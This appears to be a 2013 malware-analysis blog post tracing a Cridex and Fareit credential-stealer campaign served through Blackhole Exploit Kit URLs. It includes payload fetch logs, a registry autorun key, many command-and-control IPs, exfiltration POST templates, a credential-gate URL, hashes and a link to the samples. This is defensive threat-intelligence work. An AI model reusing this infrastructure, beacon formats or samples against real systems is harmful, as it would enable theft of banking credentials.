Tuesday, March 5, 2013

Case: "*.RU:8080/*/column.php", Hey Stealer! What do you want to steal today? Keywords: #Cridex #Fareit #Naunet


*) This is my last post for this infection, FYI: we went far too long trying to keep things right..

Today we detected malware infection campaign created by the same bad actors we always follow. The below URL was setup for Password/Credential stealer (PWS) Trojan via spam email as per reported in fellow researcher's Mr. Conrad Longmore in "Dynamoo Blog" posts→[here] and [here]:

h00p://forumla.ru:8080/forum/links/column.php
h00p://forumny.ru:8080/forum/links/column.php
h00p://forum-ny.ru:8080/forum/links/column.php
h00p://forum-la.ru:8080/forum/links/column.php
h00p://foruminanki.ru:8080/forum/links/column.php
h00p://forumilllionois.ru:8080/forum/links/column.php
h00p://210.71.250.131:8080/forum/links/column.php
h00p://198.104.62.49:8080/forum/links/column.php

These URL lead us to the two IP addresses serving Blackhole Exploit Kit below:

198.104.62.49
210.71.250.131

Which both IP are serving the same malware (see the snapshot below):

We are not going to include the Blackhole Exploit Analysis nor decoding here, and will focus on the analysis of the recent version credential stealer used. With noted: Our previous released guide→[here] to decode BHEK can be applied to decode all of the exploit components.

The CyberCriminal group itself is utilizing Russian-based .RU registrar called NAUNET(.RU), which nowadays quite famous for its reputation in "keep-on-allowing" registration of malicious domains in east Europe basis to aim worldwide servers as infectors and preying on American & European online banking information. The details of previous malicious domains used by this criminal group served by NAUNET can be seen in our previous post→[here].

Same samples in both IPs..

This is my log while fetching the first and second samples:
GET /forum/links/column.php?sf=2w:1l:1l:2v:1f&he=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&ru=w&cz=p HTTP/1.0
Host: 198.104.62.49:8080
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 05 Mar 2013 08:21:29 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Tue, 05 Mar 2013 08:21:30 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Transfer-Encoding: binary
Content-Length: 110592
200 OK
Length: 110592 (108K) [application/x-msdownload]
Saving to: `about1.exe'
2013-03-05 17:21:54 (47.6 KB/s) - `about1.exe' saved [110592/110592]
and
GET /forum/links/column.php?of=1o:1h:32:1l:1j&me=2v:1k:1m:32:33:1k:1k:31:1j:1o&n=1k&qo=q&yy=b HTTP/1.0
Host: 210.71.250.131:8080
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 05 Mar 2013 08:32:02 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Tue, 05 Mar 2013 08:32:20 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Transfer-Encoding: binary
Content-Length: 110592
200 OK
Length: 110592 (108K) [application/x-msdownload]
Saving to: `about2.exe'
2013-03-05 17:32:43 (109 KB/s) - `about2.exe' saved [110592/110592]
Compare result of the binaries:
2013/03/05  17:21  110,592 about1.exe 612b6e43fd5e5933ea072d5df501790a
2013/03/05  17:32  110,592 about2.exe 612b6e43fd5e5933ea072d5df501790a

The samples looks like this..

Picture snapshot: Which is having the below binary information:
Entry Point at 0x15d1
Virtual Address is 0x4015d1
Compile Time: 0x42973D89 [Fri May 27 15:32:25 2005 UTC] / 2005-05-28 00:32:25
CRC checks: Looks fine!

Sections:
   .text 0x1000 0x15c14 90112
   .data 0x17000 0x100370 4096
   .rsrc 0x118000 0x2408 12288

Hex first block snips..
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   31 90 0E 35 75 F1 60 66 75 F1 60 66 75 F1 60 66    1..5u.`fu.`fu.`f
0090   52 37 0D 66 76 F1 60 66 52 37 1D 66 67 F1 60 66    R7.fv.`fR7.fg.`f
00A0   52 37 11 66 8B F1 60 66 52 37 1C 66 74 F1 60 66    R7.f..`fR7.ft.`f
00B0   52 37 18 66 74 F1 60 66 52 69 63 68 75 F1 60 66    R7.ft.`fRichu.`f
00C0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
00D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
00E0   50 45 00 00 4C 01 03 00 89 3D 97 42 00 00 00 00    PE..L....=.B....
As per picture showed, it tried to fake Microsoft application:
LegalCopyright: \xa9 Microsoft Corporation. All rights reserved.
InternalName: rigpsnap.dll
FileVersion: 6.0.6000.16386 (vista_rtm.061101-2205)
CompanyName: Microsoft Corporation
ProductName: Microsoft\xae Windows\xae Operating System
ProductVersion: 6.0.6000.16386
FileDescription: Remote Installation Service Policy Snap-in
OriginalFilename: rigpsnap.dll

Infection Summary

Malware runs CMD to move original location & delete initial trace: While the Cridex trojan is saved to %AppData%\KB********.exe Cridex will be run by injected in memory then dropped a Trojan Fareit stealer in %Temp%\exp2.tmp.exe: During Cridex runs it will download configuration data to be saved in registry key as binary: We must view it in ASCII to see what it is.. as per below snapshot.. To be loaded & processedin memory as per snapshot (Cridex parts) For Trojan Fareit part, this variant is NOT using the config: But using the original stealer scheme planted in its binary..
In this variant, Trojan Win32/Cridex will make a time/delay before runs usual operation to fetch credential and communicating to motherships, and instantly shutdown after running the trojan stealer Win32/Fareit (and this time is one or two times executed..). Win32/Fareit itself will stay reside in memory until PC shutdown.

The autorun in registry was set in the usual place:

HKU\..\Software\Microsoft\Windows\CurrentVersion\Run\KB00777165.exe: 
""C:\Documents and Settings\rik\Application Data\KB00777165.exe""
which makes this set of trojans will run again (autostart) in every PC starts.

Which IP are they use as callbacks this time?

Cridex used:
h00p://209.17.186.246:8080
h00p://203.171.234.53:8080
h00p://64.85.53.168:8080
h00p://161.246.35.117:8080
h00p://202.29.5.195:8080
h00p://213.214.74.5:8080
h00p://174.121.67.199:8080
h00p://174.143.234.138:8080
h00p://18.79.3.253:8080
h00p://141.219.153.206:8080
h00p://72.251.206.90:8080
h00p://149.156.96.9:8080
h00p://212.68.63.82:8080
h00p://88.119.156.20:8080
h00p://91.199.155.222:8080
h00p://194.249.217.8:8080
h00p://109.168.106.162:8080
h00p://85.214.143.90:8080
h00p://195.191.22.97:8080
h00p://188.138.96.241:8080
h00p://31.3.103.101:8080
h00p://213.251.164.83:8080
h00p://82.100.228.130:8080
h00p://194.97.99.120:8080
h00p://78.47.153.131:8080
...with the url:
/N5nmLCAAA(random)/LxcqKAA(random)/GLkOVCAAAA(random)/ HTTP/1.1
With the HTTP header like below:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: x.x.x.x:8080
Content-Length: %n
Connection: Keep-Alive
Cache-Control: no-cache

Fareit used callbacks to below hosts/URL (HTTP/1.0)

h00p://203.114.112.156:8080/asp/intro.php
h00p://42.121.116.38:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://85.25.147.73:8080/asp/intro.php
h00p://208.87.243.130:8080/asp/intro.php
h00p://202.164.211.51:8080/asp/intro.php
h00p://111.68.142.223:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://195.24.205.188:8080/asp/intro.php
With the HTTP header like below:
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Phished credentials are sent to 37.139.47.124:
var adminPanelLocation = 'h00p://37.139.47.124/_CRE_/';
[CDATA[h00p://37.139.47.124/_CP_/cp_a.php?h=8
h00p://37.139.47.124/_CRE_/gate.php?done=1&bid=%USER%-1379CF37C25_9455E50D0B2D20CB&info=[random]
h00p://37.139.47.124/_CRE_/gate.php?bid=%USER%-1379CF37C25_9455E50D0B2D20CB&location=[random]

Hey hold on, what's the evidence?

(Click the number to download the materials below)
For the callbacks I recorded below set of PCAPs:
[1] First infection [2] Re-producing the first session infection (different env) [3] Trojan Win32/Cridex traffic captured over interval [4] Trojan Win32/Fareit traffic captured over interval
For the registry record:
[1] First infection [2] Re-producing the first infection first session (different env)
For the process runtime record:
[1] Trojan Win32/Cridex Full Process Trace [2] Trojan Win32/Fareit Full Process Trace
Stolen Credential Information:
Here's the config file with the beautified format -->>[HERE] The Trojan Win32/Fareit grabbed credential list -->>[HERE]

In Virus Total

I really took time in analysing & writing this report, yet there are so many details I cannot expose for the security purpose. I hope VT has the good detection now: Trojan Win32/Cridex - VT URL -->>[HERE]
SHA1: 531923a72560d723ed764bf3618633dc541b56f9
MD5: 612b6e43fd5e5933ea072d5df501790a
File size: 108.0 KB ( 110592 bytes )
File name: rigpsnap.dll
File type: Win32 EXE
Tags: peexe
Detection ratio: 17 / 46
Analysis date: 2013-03-05 13:58:09 UTC ( 3 minutes ago )
File ./about.exe with MD5 612b6e43fd5e5933ea072d5df501790a
----------------------------------------------------------
DrWeb                    : Trojan.Necurs.97
VIPRE                    : Win32.Malware!Drop
Symantec                 : WS.Reputation.1
TrendMicro               : WORM_CRIDEX.UWA
ESET-NOD32               : a variant of Win32/Kryptik.AVXR
Fortinet                 : W32/Kryptik.ALRY!tr
TrendMicro-HouseCall     : WORM_CRIDEX.UWA
Sophos                   : Mal/Generic-S
Ikarus                   : Trojan.Win32.Bublik
Kaspersky                : Trojan.Win32.Bublik.ahqz
PCTools                  : Suspicious.Cloud.7.L
Malwarebytes             : Trojan.FakeMS
Panda                    : Trj/dtcontx.C
Kingsoft                 : Win32.Troj.Bublik.ah.(kcloud)
AntiVir                  : TR/Bublik.ahqz
Emsisoft                 : Trojan.Win32.Bublik.ahqz.AMN (A)
Comodo                   : TrojWare.Win32.Trojan.Agent.Gen
Trojan Stealer Win32/Fareit - VT URL -->>[HERE]
SHA1: f994fbf2663ef2b9b0347f42e057bd03ed0dcefe
MD5: a25bb86368cf2e62de4f8f25b8e0824a
File size: 104.0 KB ( 106496 bytes )
File name: rigpsnap.dll
File type: Win32 EXE
Tags: peexe
Detection ratio: 7 / 46
Analysis date: 2013-03-05 13:58:42 UTC ( 4 minutes ago )
File ./exp2.tmp.exe with MD5 a25bb86368cf2e62de4f8f25b8e0824a
-------------------------------------------------------------
Symantec                 : WS.Reputation.1
ESET-NOD32               : a variant of Win32/Kryptik.AVXR
TrendMicro-HouseCall     : TROJ_GEN.F47V0305
Kaspersky                : Trojan-PSW.Win32.Tepfer.groi
PCTools                  : Suspicious.Cloud.7.L
Malwarebytes             : Trojan.FakeMS
Fortinet                 : W32/Kryptik.ALRY!tr

Samples

For the research & raising detection ratio purpose we are sharing the analyzed samples: Download here -->>[HERE]

Additional Section

*) This section is to be added with additional information periodically. The below new detection also noted: ・This cridex variant was detecting whether the infected PC is 64bit or not.. ・Many new additionals cookies & etc function in the config file.. ・For the NAUNET Registrar relation PoC to these domains is here -->>[HERE] ・Until now, we analyzed 25 times for this cybercrime group, 1 dir = 1 analysis↓
#MalwareMustDie! The NPO.